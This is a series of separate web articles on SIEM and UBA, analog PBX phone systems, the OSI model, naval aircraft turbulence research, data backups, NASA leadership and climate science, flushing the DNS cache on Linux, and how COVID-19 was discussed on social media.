An important fact to note is that UBA tools cannot work on a standalone basis. UBA is a complement to SIEMs and so both must be implemented for the greatest level of defence and intelligence. Utilising a combination of both SIEM and UBA allows for maximum visibility of the full network and the individual users on that network. This allows security teams to keep the organisation safe from outside threats while simultaneously preventing inside threats from launching a surprise attack. The ultimate in cyber defence.
SIEM is a valuable cyber security tool. It provides wide visibility across the network but requires the precise intelligence on the individual users that UBA offers. Insider threats are rising in prominence as a cyber security threat and SIEM alone simply cannot supply enough data to fight against it and can only react when the attack has already occurred. To be proactive in preventing and identifying insider threats UBA needs to be adopted alongside SIEM so that both can be used in tandem to protect the business from both outsider and insider threats.
Interested in hearing industry leaders discuss subjects like this and sharing their use-cases? Attend the co-located IoT Tech Expo, Blockchain Expo, AI & Big Data Expo and Cyber Security & Cloud Expo World Series with upcoming events in Silicon Valley, London and Amsterdam and explore the future of enterprise technology. | <urn:uuid:d593c5fc-4de7-42ee-b269-ed9ea1c9d5b5> | CC-MAIN-2022-40 | https://www.enterprise-cio.com/news/2019/feb/28/why-siem-alone-not-able-stop-insider-threats/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00515.warc.gz | en | 0.949338 | 1,137 | 2.625 | 3 |
Traditional Analog PBX Phone Systems: How Do They Work?
A private branch exchange (PBX) is an office telephone system installed inside a company that connects users through local phone lines. It’s a telephone system that routes calls between users through local networks while allowing everyone to share a limited number of external phones.
Originally, private branch exchanges were equipped with analog technology. Today’s PBXs are based on digital technology, with digital signals being transformed to analog for outgoing calls on the local loop, made possible by utilizing Plain Old Telephone Service (POTS) lines. Network switching systems are built into PBXs, which allows them to be connected to an enterprise’s digital PBX system if this is desired.
Let us look at how PBX phones and POTS function, their main purpose, and how they work.
What Is An Analog PBX Phone System?
PBX (private branch exchange) is a switching mechanism that links the phones and extensions inside a firm to one another as well as to external analog lines. Using this method, a large number of employees can share a limited number of external phone lines, potentially reducing costs.
An analog PBX system employs regular Plain Old Telephone Service (POTS) phones and copper wire for communication. They are dependable, provide excellent speech quality, and have all of the essential capabilities of a traditional house phone (such as hold, mute, redial, and speed dial), as well as the ability to transfer calls across extensions. They are also inexpensive.
An analog PBX system maintains operational extensions even if the power goes off, and users will continue to be able to communicate. They are generally inexpensive since they are straightforward and offer few choices for expansion or improvement.
On the other hand, they are more costly to maintain, set up, and update since they are less modular. To relocate an extension, for example, requires the rewiring of the punchboard by a qualified technician board.
Analog phone systems are associated with traditional landline telephone services. They link phones by sending speech signals over copper cables and via a series of physical switches to establish a connection between them.
Businesses that are still employing analog phone technology have often had their system in place for a long time. It is also common to see a Private Branch Exchange (PBX) system in operation in the majority of scenarios.
Read up on the parts of call flow here!
How Do Analog PBX Phone Systems Work?
The complexity of the system dictates the type of system that is used, whether it is a traditional PBX to which copper telephone landlines are connected, whether it allows a mix of analog and digital lines, whether it uses voice over IP (VoIP) hosted at the organization, or whether it is a cloud-based PBX system, among other things. Each of these is covered in further depth lower down the page.
Office telephones that use an analog PBX system rely on landline copper-based telephone lines that enter a business’s premises and are linked to a central office PBX box.
These switch boxes are made up of telephony switches that allow calls to be distributed to different phones throughout an office while also allowing those phones to communicate with a limited number of outside lines, known as trunk lines, at the same time.
An IP PBX, also known as an Internet Protocol PBX, is an office telephone system that sends calls using digital phone signals rather than traditional landlines.
Because Ethernet cables may be used to link phones instead of traditional phone lines, there is no need to rewire the system. IT management service providers may also host IP PBX systems, which makes them more accessible.
Hosted systems demand monthly payments even though there are fewer hardware expenditures connected with their utilization on the part of the end customer.
Smaller PBX systems, often known as virtual PBXs, provide hosted services but have fewer functions than larger PBX systems.
Landline phones and analog phones are identical terms. A PBX for landlines is used to connect calls between phones by transmitting voice signals over copper cables and then through a series of physical switches.
Businesses that still use analog phone technology have often had their system in place for many years. These businesses also often rely on Private Branch Exchange technology to communicate.
See the reasons why call flow is important here.
Modern PBX Systems
Modern PBXs are equipped with a variety of management capabilities that make communication inside enterprises easier and more effective, hence increasing productivity.
Size and complexity vary, from large-scale corporate communication systems costing thousands of dollars and requiring extensive training to simple plans that may be hosted in the cloud for a small monthly price. The most basic functions of simple home-based PBX systems are available as an update to existing conventional phone lines.
Although the functions of a PBX might be complicated, the following are the most important ones:
- In an organization, the use of more than one telephone line is permitted.
- Telephone call management, including incoming and outgoing.
- One phone line is divided into many internal lines, which are designated by three- or four-digit numbers called extensions, and calls are transferred to the internal line that is most suited for the caller.
- Internal phone interactions are handled by the IT department.
- VoIP (Voice over Internet Protocol) calling, which offers a variety of advantages and upgrades over the traditional telephone, the most notable of which is the cost savings, is becoming more popular.
- Call recording, voicemail, and interactive voice response (IVR) systems provide a high-quality user interaction (interactive voice response).
- Automated replies, which automatically lead consumers to the most relevant lines using voice menus, are becoming more popular.
Main Purpose Of PBX System
A telephone switch station (PBX) is a device that enables users to make and receive phone calls across a telephone network. In its most basic form, it is comprised primarily of numerous office phone system branches, and it transfers connections to and from them, thus connecting phone lines.
A PBX is a device that allows businesses to connect all of their internal phones to a single external line. This allows them to lease just one phone line and have several individuals use it, with each person having a phone at the desk with each phone having a unique number.
However, since it is based on the internal numbering system, the number does not have the same structure as a phone call. With a telephone system, it is only necessary to dial three-digit or four-digit numbers to connect with another phone on the network when using a private branch exchange (PBX).
Find out more about Automatic Call Distribution (ACD): What is it? How Does it Work?
A PBX system makes it simple and economical for businesses to utilize more than one phone line at the same time. A PBX, which manages both incoming and outgoing calls, makes it possible to divide a single phone line into numerous private lines, each of which is identifiable by an extension (usually assigned 3 or 4-digit numbers).
Not only does this make it simple for customers to contact everyone in an office by dialing a single phone number, but it also allows the group to communicate internally without the need for many separate phone lines, which saves money. VoIP communication is enabled by PBX systems as well.
Learn more about how VoLTE works here!
Functions of PBX Systems
PBX systems are responsible for four primary call processing tasks:
- Connect the phone sets of two users by dialing their extension numbers.
- Maintain connections for as long as the users need them to be maintained.
- Disconnect a connection based on the demands of the user.
- Provide information to the company for it to perform accounting and analytics functions.
Although it is realistic to assume that all PBX systems provide the capabilities outlined above, the vast majority of contemporary PBX systems additionally include a profusion of additional calling tools and capabilities (though each PBX may differ in which features they offer).
Some of the most often offered PBX functions are as follows:
- Call management is accomplished by the use of call blocking, call forwarding, call logging, call transfer, and call waiting for services.
- Customers’ experiences are enhanced as a result of call recording, voicemail, IVR (Interactive Voice Response), and Direct Inward Dialing (DID) technology (Direct Inward Dialing). Custom greetings, welcome messages, and holding music are some of the additional customer-facing features that are often offered with a PBX system.
- During business hours, conference calls and internal extensions are used to communicate among employees and departments.
- Local connections enable customers to have local phone numbers in locations where they are not physically present, allowing them to operate ‘virtual offices’ from anywhere in the world.
Discover the Automated Answering Services: How Do They Work?
Large corporations must have PBX office phone systems to properly organize their telecommunications infrastructure. PBX infrastructure may be beneficial to small and mid-sized firms, but hosted solutions, rather than pricey on-premise systems, will often provide higher value to these organizations in the long run.
When a company relies on incoming or outgoing phone calls, moving to a PBX office phone system will result in quick and noticeable advantages. Digital PBX systems are great assets for businesses that rely on telephone-centric business operations because of their enhanced functionality and cheaper telephone expenses.
Companies wishing to incorporate comprehensive telephone customer service capabilities will need to do so via the use of a private branch exchange (PBX). It is important to have a system in place for efficiently routing calls during peak times so that consumers have an enjoyable customer service experience while also ensuring that internal calls are dealt with separately.
Hosting PBX options for small organizations need little to no upfront cost and managed suppliers provide a wide choice of customizable plans that are based on real service consumption. This technology is appealing to practically any company because of its ability to deliver enterprise-level telecommunications solutions in a scalable way. | <urn:uuid:df046c15-9f2d-4395-ab86-78997984096c> | CC-MAIN-2022-40 | https://callflowsolution.com/analog-pbx-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.947169 | 2,084 | 2.75 | 3 |
Networking Basics: What is the OSI Model?
The Quick Definition: The Open Systems Interconnection model (OSI model) is a conceptual model that characterizes and standardizes the communication functions of a telecommunication or computing system without regard to its underlying internal structure and technology. The seven layers are: Physical, Data Link, Network, Transport, Session, Presentation, and Application.
Why you should learn the OSI model
If you poke around the subject of the OSI model, you'll find varying opinions. Some argue that it's outdated because it doesn't fit current networking protocols. Besides, the OSI model is theoretical, right?
But hear us out. If you're studying for CompTIA Network+ or Cisco CCENT certification, you'll likely be tested on the OSI model. In the IT field, you'll hear vendors pitch their products by discussing which layers work with each project.
The bottom line is familiarity with the OSI model enables you to understand how protocols, devices, and applications interact with each other. This is especially handy when new technologies hit the market and pique your organization's interest.
OK, now it's time to take a look at each of the seven layers of the OSI model.
Layer 1: Physical
This layer is the physical representation of a network. It includes everything from cable types to pins. When there's a network issue, the first thing IT pros usually check would be physical layer elements such as the power plug or the network cables.
Layer 2: Data Link
Switches and hubs operate at this layer within most networks. Node-to-node data transfer and Kill connection (from the physical layer) is handled at Layer 2. It's also worth noting that at Layer 2 two sublayers exist: the media access control (MAC) and logical link control (LLC) layers.
Layer 3: Network
Now we're getting to the good stuff! Layer 3 is the crux of router functionality. Packet forwarding and routing happens at this layer. Let's say you're based in Washington DC and need to connect to a server in Seattle. There are millions of paths to choose from — and routers at the Layer 3 level make this process quick and successful.
Layer 4: Transport
How much data needs to be sent? At what rate does it need to be sent? Where is it going? How is the traffic segmented for efficient delivery and put it back together? There's a lot that needs to be considered when it comes to data transfer. Fortunately, Layer 4 handles the data coordination between hosts and systems.
You'll encounter the Transmission Control Protocol, commonly referred to as TCP, at the Transport Layer. This protocol is is built on top of the Internet Protocol (IP), which is known as TCP/IP. TCP port numbers work at Layer 4, while IP address work at Layer 3, the Network Level.
Layer 5: Session
You're likely familiar with the ol' saying, "It takes two to tango." Well, in the world of networking, it takes a session for two devices to communicate with each other. It's at this level that session setup, how long systems should wait for responses, and terminations between applications at the end of sessions occur.
Layer 6: Presentation
At some point, data has to be translated from networking format to application format or vice versa. So, think of this layer as "presenting" data to application or network. A prime example of this would be the encryption and decryption of data for secure transmission. This all happens at the Layer 6 level.
Layer 7: Application
We've finally reached the only layer non-IT folks care about: Layer 7. End users directly interact with applications that work at the Layer 7 level. We all use web browsers like Chrome or Firefox, which are Layer 7 applications. And speaking of apps, any of them like Microsoft Office or ESPN also are Layer 7 apps.
OSI Model in the Real World
While conceptual in nature, the OSI model can come in handy on the job.
If there's an issue with a network, having a visual map of what's occurring can help IT pros narrow down the problem. For example, is it a physical layer or an application layer issue? Another example of the OSI model being helpful is within the programming realm. To create a successful app, programmers should know what layers will interact with their apps.
For more about the OSI model, here's what CBT Nuggets trainer Keith Barker has to say: | <urn:uuid:c3c7dba4-6dd4-4a53-9cad-fdc51966597d> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/programming/networking-basics-what-is-the-osi-model | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.934328 | 933 | 3.921875 | 4 |
One might not think “aircraft” when picturing the U.S. Navy, but the military branch actually has thousands of aircraft currently in service – and now, supercomputing will help future naval aircraft operate faster, safer and more efficiently. Thanks to a $541,167 grant from the Office of Naval Research (ONR), researchers at Penn State will use the university’s Roar supercomputer to examine the effects of turbulence on aircraft in more unconventional situations.
Specifically, the research will focus on freestream turbulence. When an aircraft flies, “tip vortices” can form along the edges of its wings or engines. Normally, these tip vortices are predictable; however, in less normal situations (like taking flight over rough seas), they can become unpredictable and dangerous. Current naval aircraft designs hedge their bets with safer designs to account for these unknowns.
“As the Navy is trying to create more aggressive designs, they want to push the envelope to get every ounce of performance they can,” said David Williams, principal investigator for the research and an assistant professor of mechanical engineering at Penn State, in an interview with Penn State’s Erin Cassidy Hendrick. “As those engineers are trying to improve airplane wings, inlets or turbomachinery applications, we want them to have a clearer understanding of what the effects of freestream turbulence could be.”
The research project will consist of both a computational component and a physical component. The computational experiments will utilize Penn State’s Roar supercomputer, hosted by its Institute for Computational Data Sciences (ICDS). According to the ICDS, Roar contains “over 1000 servers with more than 23,000 processing cores, 6 petabytes of disk parallel file storage, 12 petabytes of tape archive storage, high-speed Ethernet and InfiniBand interconnects and a large software stack.”
“When a lot of the current helicopters and airplanes were designed in the 80s or 90s, the computational power was lower,” Williams said. “In the modern era, using Roar and some Department of Defense supercomputers, we can go after some problems in a way that just couldn’t be done before.”
Using Roar, the researchers will simulate the “entire range” of freestream turbulence flows, then validate the resulting models using a wind tunnel in Penn State’s Experimental and computational Convection Laboratory.
“In addition to enabling safer operation, we want the Navy to be able to push the envelope a lot further,” Stephen Lynch, who is also a principal investigator for the research and an assistant professor of mechanical engineering at Penn State. “If we find where the boundary exists on these conservative designs and show you can go up to this exact point, we can increase performance and maintain safety.”
To read the reporting from Penn State’s Erin Cassidy Hendrick, click here. | <urn:uuid:1c946fa6-477f-4795-b4f0-1eb63280725c> | CC-MAIN-2022-40 | https://www.hpcwire.com/2021/01/14/roar-supercomputer-to-support-naval-aircraft-research/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00515.warc.gz | en | 0.932343 | 617 | 3.296875 | 3 |
You may not have known this, but Thursday March 31st is World Backup Day. It is a global occasion dedicated to raising awareness around just how reliant we have become on data, why it’s important for big organizations and private individuals alike to backup, and how to best protect our data. This short guide introduces you to the key types of data backup, why they’re important, and why backing up should become part of your daily routine.
Why are backups important?
As much as we try, it’s almost impossible to mitigate against all potential accidents or vulnerabilities to malicious cyberattacks. Backups are a fundamental element of disaster preparation, ensuring that you’re fully prepared against data loss or theft. Backups give users invaluable peace of mind (you don’t have to worry about losing sentimental, private, or personal data) and also ensure that your potential downtime is as short as possible.
Though data loss, theft and compromise is prevalent, it might come as a surprise that 21% of people have never made a backup. This is the problem that World Backup Day is trying to address.
Different types of backup
‘Backing up’ your computer or device can take different forms. There’s no ‘right’ way to backup your data, instead the best backup method for you depends on your user profile and needs.
Online cloud backup services
When you backup online, you’re backing up your data remotely via the internet. Your backed up data is stored in what is known as ‘the cloud’, and is accessible at any time over the internet. Most cloud backup services offer automatic and continuous backup, as well as automated encryption, meaning your backup is always up-to-date and highly secure. Bear in mind, however, that cloud-based backups can be vulnerable to malicious activity exposing your data to risk.
External hard drive backups
Hard drive backups are physical devices that store your data. Backing up to a hard drive is a manual process and can be limited by the capacity of the storage device you’ve got. Hard drive backups do not rely on an internet connection. Note however, that the physical security and location of your hard drive will be your biggest concern and risk factor.
NAS backup stands for ‘Network Attached Storage’ Backup. In actual fact, NAS is not intended as a backup mechanism, but many organizations still use it as such. NAS is a file storage system that is intended to foster collaboration between users.
USB or flash drive backup
You can go a little old-school and simply backup to a USB stick. Simply load the files that you want to backup onto the flash drive and you’re done! For obvious reasons, this method is more effective at an individual level.
Best backup practices
Don’t be fooled, it’s not enough to back up once and never think about it again. Here are a few best practices to follow for maximum peace of mind:
- Backup regularly at consistent intervals.
- Backup to more than one location for maximum security
- Encrypt your backups
- Consider endpoint devices that you might have overlooked in your backup
If you have a BYOD policy in place, then consider how these personal devices should fit into your backup infrastructure RMM Software, PSA and Remote Access that will change the way you run your MSP Business
See Atera in Action
RMM Software, PSA and Remote Access that will change the way you run your MSP Business | <urn:uuid:8836e635-7dc1-410d-814a-6fd9b18e7657> | CC-MAIN-2022-40 | https://www.atera.com/blog/world-backup-day-march-31st-2022/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00515.warc.gz | en | 0.944614 | 728 | 2.6875 | 3 |
Trump’s NASA nominee is Jim Bridenstine, a congressman from Oklahoma.
NASA has a likely new head, and like other people the Donald Trump administration has put in top science-related jobs, he’s not a big fan of climate-change research.
Trump’s NASA nominee is Jim Bridenstine, a congressman from Oklahoma. In 2013, he told Congress that global temperatures “stopped rising 10 years ago” (not true) and that “global temperature changes, when they exist, correlate with sun output and ocean cycles” (there is a small correlation, but plenty of research shows greenhouse gases play a far larger role). Two years ago he needled “climate-change alarmists” on Twitter.
But assuming the Senate confirms his nomination (a formality), Bridenstine will lead a space agency that spends nearly a tenth of its budget on “earth science,” which includes research into both weather patterns and climate change. Trump originally said he wanted to scrap the earth science program entirely in favor of space exploration, but his proposed 2018 budget took a milder approach, cutting the program by a little under 10%, to $1.8 billion. NASA’s overall budget is $19.6 billion.
Bridenstine evidently knows the importance of weather research. “People often say, ‘Why are you so involved in space issues?'” he reportedly said at a commercial space transportation conference this year. “My constituents get killed in tornadoes. I care about space.” In his 2013 speech in Congress, he chided president Barack Obama for spending “30 times as much money on global warming research as he does on weather forecasting and warning.” (That’s false too.)
From this one may infer that Bridenstine believes it’s important to, say, track and study major storms, but less important to investigate why they’re becoming more severe, even though researchers have found over and over that global warming is making phenomena like hurricanes, floods, droughts, heatwaves, and wildfires more devastating than they would have been otherwise.
The trouble is that weather research and climate research are not so simple to disentangle. NASA’s 16 earth science satellites (plus three other instruments attached to the International Space Station) make up the core of the agency’s climate science program. They don’t just collect data on climate change; they also monitor, among other things, the oceans, soil health, wildfires, air quality, and hurricanes. That makes the program useful for emergency response during major, fast-developing storms.
Right now, Hurricane Irma, the second-strongest hurricane ever observed over the Atlantic Ocean, is barreling through the Caribbean en route to Florida—and a team from NASA and the National Oceanographic and Atmospheric Administration is watching its path with the most advanced weather satellite the agencies have ever built. The GOES-16 satellite, launched last year, can take far higher resolution images of the developing storm than any of its predecessors.
While Bridenstine’s climate-denying comments from 2013 are sure to come up in his Senate confirmation hearings, a former colleague told told Science magazine that Bridenstine does believe the planet is warming and that carbon dioxide is a greenhouse gas. As for his climate change-denial comments from 2013, he’d “probably say it differently today.” In an editorial, the editor of The Tulsa World said the same thing—that Bridenstine told him he would have phrased it differently now.
But he also told the editor he had opposed the US’s involvement in the Paris climate accord, from which Trump has said the US will withdraw, and that while he does believe carbon dioxide is warming the planet, he would probably disagree “about the severity of the problem” with people who accept the scientific consensus. The editor noted that he doesn’t believe Bridenstine has “moderated much” since his 2013 speech on the House floor.
Columbia University climate law professor Michael Gerrard was more forceful, calling Bridenstine a “climate denier” on Twitter.
It’s not yet clear, then, what Bridenstine would do to NASA’s earth sciences program. But any large, immediate cutbacks to the mission would be difficult if not impossible. Ceasing to fly the satellites simply isn’t an option, according to a contractor Quartz spoke with earlier this year, who works as an engineer for one NASA satellite that collects climate data.
“If you stopped operations—if nobody manned the satellites—they would crash and spread space debris,” which would threaten other satellites in orbit and is a danger nobody would risk, the engineer said. Bringing the satellites back to Earth is another option, but the “deorbiting process” takes “years and years,” the engineer says. Plus, most contractors are on a five-year contract, and the sprawling infrastructure and personnel involved in ongoing missions couldn’t just be terminated or shifted to another agency without enormous expense.
Still, while ceasing the earth science program altogether might not be practical, the engineer worried about NASA simply ceasing data collection from the satellites. That would punch a hole in the data used by climate scientists worldwide and jeopardize the scientific rigor of US research.
NEXT STORY: What We Don't Know About What Facebook Knows | <urn:uuid:e6f26c10-748f-46e6-9699-7e16907f6bad> | CC-MAIN-2022-40 | https://www.nextgov.com/analytics-data/2017/09/nasas-next-head-wants-it-do-less-climate-science-and-more-weather-science-you-cant-separate-them/140816/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00515.warc.gz | en | 0.95221 | 1,147 | 2.546875 | 3 |
DNS, short for the Domain Name System protocol, is used on Linux systems in order to retrieve IP addresses associated with names.
For example, when you are performing a ping request, it is quite likely that you are using the DNS protocol to retrieve the server IP.
In most cases, the DNS requests that you perform are stored in a local cache on your operating system.
However, in some cases, you may want to flush the DNS cache of your server.
It might be because you changed the IP of a server on your network and you want the changes to be reflected immediately.
In this tutorial, you are going to learn how you can easily flush the DNS cache on Linux, whether your system uses systemd-resolved or dnsmasq.
In order to be able to flush your DNS cache, you have to know how DNS resolution works on your Linux system.
Depending on your distribution, you may find different Linux services acting as the local DNS resolver.
Before you start, it is quite important for you to know how DNS resolution will actually happen on your operating system.
If you are reading this article, you are looking to flush the cache of your local DNS resolver. However, that local cache is only one link in a chain: there are many different caches along the way, from your local application all the way to the authoritative DNS servers on the Internet.

In this tutorial, we are going to focus on the local stub resolver implemented on every Linux system.
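As a concrete starting point, the sketch below uses the getent utility (present on virtually every Linux system) to perform a lookup through the local stub resolver — exactly the kind of request that populates the cache we are about to flush:

```shell
# Resolve a name through the system's configured resolution chain
# (NSS -> local stub resolver -> upstream DNS). On repeated runs,
# the answer may be served from the local cache.
getent hosts localhost
```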
Finding your local DNS resolver
$ sudo lsof -i :53 -S
Note: why are we running this command? As DNS runs on port 53, we are looking for the process associated with the service listening on port 53, which is your local DNS resolver, or “stub”.
As you can see, on a recent Ubuntu 20.04 distribution, the service listening on port 53 is systemd-resolved. However, if you were to execute this command on Ubuntu 14.04, you would get a different output.
In that case, the local DNS resolver used is dnsmasq, and the commands are obviously different.
Knowing this information, you can go to the chapter you are interested in. If you were to have a different output on your server, make sure to leave a comment for us to update this article.
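If “lsof” is not available, another quick check is to look at “/etc/resolv.conf”: on systemd-resolved systems it usually points at the 127.0.0.53 loopback stub. The sketch below parses a sample copy of the file so it can be run safely anywhere (the file contents here are illustrative):

```shell
# Write a sample resolv.conf; on a real system you would read /etc/resolv.conf itself.
cat > /tmp/sample-resolv.conf <<'EOF'
# This file is managed by man:systemd-resolved(8). Do not edit.
nameserver 127.0.0.53
options edns0
EOF

# Print the configured nameserver: 127.0.0.53 indicates the systemd-resolved stub.
awk '/^nameserver/ { print $2 }' /tmp/sample-resolv.conf
```

Seeing 127.0.0.53 strongly suggests systemd-resolved is in charge, while an address such as 127.0.0.1 may instead point to dnsmasq or another local resolver.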
Flush DNS using systemd-resolved
The easiest way to flush the DNS on Linux, if you are using systemd-resolved, is to use the “systemd-resolve” command followed by “--flush-caches”.
Alternatively, you can use the “resolvectl” command followed by the “flush-caches” option.
$ sudo systemd-resolve --flush-caches $ sudo resolvectl flush-caches
In order to verify that your Linux DNS cache was actually flushed, you can use the “--statistics” option that will highlight the “Current Cache Size” under the “Cache” section.
$ sudo systemd-resolve --statistics
Congratulations, you successfully flushed your DNS cache on Linux!
Flush DNS cache using signals
Another way of flushing the DNS cache can be achieved by sending a “USR2” signal to the “systemd-resolved” service that will instruct it to flush its DNS cache.
$ sudo killall -USR2 systemd-resolved
In order to check that the DNS cache was actually flushed, you can send a “USR1” signal to the systemd-resolved service. This way, it will dump its current state into the systemd journal.
$ sudo killall -USR1 systemd-resolved $ sudo journalctl -r -u systemd-resolved
Awesome, your DNS cache was correctly flushed using signals!
Flush DNS using dnsmasq
The easiest way to flush your DNS resolver, when using dnsmasq, is to send a “SIGHUP” signal to the “dnsmasq” process with the “killall” command.
$ sudo killall -HUP dnsmasq
Similarly to systemd-resolved, you can send a “USR1” signal to the process in order for it to print its statistics to the “syslog” log file. Using a simple “tail” command, we are able to verify that the DNS cache was actually flushed.
$ sudo killall -USR1 dnsmasq $ tail -n 100 /var/log/syslog
Now what if you were to run dnsmasq as a service?
Dnsmasq running as a service
In some cases, you may run “dnsmasq” as a service on your server. In order to check whether this is the case or not, you can run the “systemctl” command, or the “service” one if you are on a SysVinit system.
$ sudo systemctl is-active dnsmasq # On SysVinit systems $ sudo service dnsmasq status
If you notice that dnsmasq is running as a service, you can restart it using the usual “systemctl” or “service” commands.
$ sudo systemctl restart dnsmasq # On SysVinit systems $ sudo service dnsmasq restart
After running those commands, always make sure that your services were correctly restarted.
$ sudo systemctl status dnsmasq # On SysVinit systems $ sudo service dnsmasq status
In this tutorial, you learnt how you can quickly and easily flush your DNS cache on Linux.
Using this article, you can easily clear the cache for systemd and dnsmasq local resolvers. However, you should know that there is another common DNS server, named Bind, that is purposefully omitted in this article.
Another article about setting up a local DNS cache server using BIND should come in the near future.
If you are interested in DNS queries and how they are performed, you can read this very useful article from “zwischenzugs” named “Anatomy of a DNS query”. The article is particularly useful if you want to debug DNS queries and you wonder how they are performed.
Also if you are interested in Linux System Administration, we have a complete section about it on the website, so make sure to check it out. | <urn:uuid:0d75b0d0-351d-4734-ae0d-8425cf9e6bc2> | CC-MAIN-2022-40 | http://dztechno.com/how-to-flush-dns-cache-on-linux-devconnected/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00515.warc.gz | en | 0.9199 | 1,331 | 3.109375 | 3 |
Yiğit Bulut, Partner, and CTO at EYP Mission Critical Facilities, also contributed to this article.
Globally, most data centers are designed and constructed with the primary goal of achieving highly reliable facilities that are engineered to remain online and operational in the face of any foreseeable or unforeseeable eventualities.
Data centers, by nature of the information technology (IT) equipment they support and the processes which run on them, are considered mission critical and must remain operational as continuously as possible.
The need for an emergency power supply system (EPSS) to run for 120 minutes (generally requiring onsite fuel storage), or longer for most data center operators, has resulted in the selection of diesel engine generators as the primary and most common choice of back-up energy for critical systems.
The typical topology consists of different combinations and levels of redundancy of UPS backed up by diesel generators with 12 to 72 hours or more of onsite fuel storage.
But in terms of its future as a standby source of power for data centers, the road map for diesel looks like one of increasing restrictions on use, tougher tax regimes, permitting, lower emissions targets, improved air quality requirements and lower noise regulations.
This raises an intriguing question: Will data center primary or emergency power move to natural gas engines?
The case for gas
One of the main advantages of gas burning over diesel burning is lower emissions – less NOx and CO2.
Natural gas (NG) engines have better emission profiles than same-size diesel engine generators. Depending on the type of ignition system used, NG generators in the higher power ratings are typically either lean burn, where the air-to-fuel ratio is higher than the stoichiometric ratio (16:1), resulting in a lower combustion temperature that minimizes NOx emissions, or rich burn, where the air-to-fuel ratio is lower.
The trade-off between the two combustion types boils down to two competing considerations: the lean burn engine, while having a better emission profile and efficiency, does not have the block loading or load acceptance capability of the rich burn engine. This explains why, historically, rich burn engines have been preferred over lean burn engines for standby operation.
In comparison to US EPA Tier 2 diesel generators, both lean burn and rich burn NG generators produce less NOx and CO2 per kW - but at a higher initial cost.
For some, that alone might be seen as making a strong enough case for transitioning.
The case against gas
What are the challenges for using gas?
- On site fuel storage
- Poor utility connections
- High initial capex – but TCO is narrowing
- Design considerations
Onsite fuel storage has historically been one of the major stumbling blocks for the use of NG generators in emergency operations, since emergency operation requires onsite fuel storage in amounts that are difficult to achieve for natural gas under most codes. For a data center to be Tier certified, a minimum of 12 hours of onsite fuel storage for standby operation is needed. Even if the data center is not to be Tier certified, most data center operators will not be comfortable with no onsite fuel storage.
In the past, the argument has been made that the natural gas distribution system is inherently reliable, principally because it is almost entirely underground and because it is a mesh-based system. However, this is not always so, as evidenced with the failure of the natural gas supply during the Texas power outage of the winter of 2021.
As stated above, when compared to EPA Tier 2 diesel generators, NG units present a higher initial capex. Consider, however, that current US emission requirements for Tier 4 final certified engines add significant cost to diesel generators. These will deliver lower emission levels which are closer to their NG counterparts. On the basis of emissions, this narrows the advantage of NG generators, but because of the added cost of diesel infrastructure it also makes NG generators more cost competitive.
Design considerations for natural gas engines
Given the advances in NG generator designs and capabilities, as well as their favorable emissions profiles with respect to diesel generators, if the decision is made to incorporate them into the power plant for the data center, there are design considerations that need to be weighed. NG generators cannot simply be substituted for their diesel counterparts in most designs.
The load acceptance profile of NG generators requires a careful evaluation of the design topology and the interaction of the various loads with the generators. Given that over the last few years most data center UPS battery plants have been optimized for shorter and shorter run-times, some as low as 1 to 3 minutes, it is necessary to evaluate this based on the decision to incorporate lean or rich burn engines. UPS walk-in times, as well as an evaluation of the mechanical load start up profile, should be evaluated to align with the load acceptance profile of the NG generator selected.
For a deeper perspective on standby power generation which provides a technical analysis of gas reciprocating engines read the i3 Solutions/EYP White Paper: “The Case for Natural Gas Generators," which compares emissions profiles and performance characteristics of diesel and gas generators, and outlines the case for, and the challenges to, adopting gas reciprocating engines for use in data centers. | <urn:uuid:d2d2f142-fe5e-486f-90f7-eded27564e2a> | CC-MAIN-2022-40 | https://direct.datacenterdynamics.com/en/opinions/will-natural-gas-replace-diesel-as-a-data-center-power-source/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00515.warc.gz | en | 0.939393 | 1,062 | 2.59375 | 3 |
It’s impossible to escape discussion about the coronavirus. Wherever you go online, discussions are dominated by the spread of COVID-19, the disease caused by the coronavirus, with social media users swapping tips, tricks and information – as well as varying levels of accurate advice – about its spread.
But a new paper by Italian researchers shows that what may at first seem like a unified, global conversation is actually very disparate, with different platforms focusing on different parts of the coronavirus issue.
A team of nine academics have analysed the way information about COVID-19 is spread and shared on Twitter, Instagram, YouTube, Reddit, and Gab. The team looked at more than eight million comments posted over 45 days since the existence of coronavirus first caught the attention of the world. They also analysed user engagement and interest around the coronavirus.
How they did it
The team monitored key terms around the coronavirus, based on Google Trends’ related queries, covering phrases and words like “pandemic” and “Wuhan”. They found nearly 3.4 million users had posted comments about coronavirus-related issues across the different social platforms.
What the researchers found was interesting: on Reddit and YouTube, discussions revolved primarily around the death toll and rising infection rates. On Twitter, the main topics of discussion were the suspension of flights and repatriation, as well as the economic impact and advice on how to protect yourself against the spread of the virus.
Instagram was different: the main discussion points on the photo-sharing platform, accounting for nearly half of all interactions the researchers measured there, was focused on the “Chinese crisis”.
On Gab, the social media platform established after Twitter was accused of censoring extreme viewpoints, more than half of the discussions measured by the researchers revolved around the unfolding crisis on the Diamond Princess, the cruise ship that was a crucible for infection, and the notion that the spread of the virus was the result of biological warfare.
Reddit has in-depth conversations
The number of different topics discussed also shines some light on the makeup of each platform’s users. Redditors managed to cover 19 different areas, including the censorship of the Chinese internet by tech giant Tencent to try and stifle news about the coronavirus escaping from China. Perhaps predictably, Instagram had the least in-depth analysis of the subject, focusing mainly on advice on how to protect yourself, the mounting death toll, and comparisons with other viruses.
